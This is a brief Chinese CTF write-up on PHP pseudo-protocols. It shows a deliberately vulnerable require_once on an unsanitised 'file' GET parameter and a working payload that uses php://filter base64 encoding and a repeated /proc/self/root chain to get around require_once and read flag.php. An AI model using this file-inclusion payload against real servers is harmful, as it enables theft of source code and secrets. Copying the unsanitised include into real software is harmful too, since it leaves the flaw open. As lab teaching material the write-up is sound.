伪协议
一、示例代码
题目提示:伪协议(考点:伪协议读取、系统进程) 伪协议读取flag.php,/proc/self指向当前进程的
显示代码
代码语言:javascript复制<?php
highlight_file(__FILE__);
require_once 'flag.php';
if(isset($_GET['file'])) {
require_once $_GET['file'];
}相关知识:PHP伪协议
- PHP伪协议详解
- require_once 绕过不能重复包含文件的限制
构造Payload:
?file=php://filter/read=convert.base64-encode/resource=file:///proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/flag.php
版权属于:瞳瞳too
本文链接:https://cloud.tencent.com/developer/article/2371703
本站未注明转载的文章均为原创,并采用 CC BY-NC-SA 4.0 授权协议,转载请注明来源,谢谢!
